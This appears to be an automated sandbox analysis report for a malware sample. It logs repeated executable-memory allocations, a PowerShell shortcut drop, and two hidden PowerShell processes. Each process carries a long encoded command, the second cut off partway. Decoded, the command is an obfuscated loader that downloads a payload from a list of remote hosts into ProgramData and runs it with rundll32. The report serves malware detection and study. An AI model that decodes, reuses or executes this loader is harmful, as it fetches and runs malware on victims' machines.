NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02680000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02773000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02774000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02775000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02776000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02777000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02778000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02779000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04941000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04942000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04943000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04944000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA="

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQAR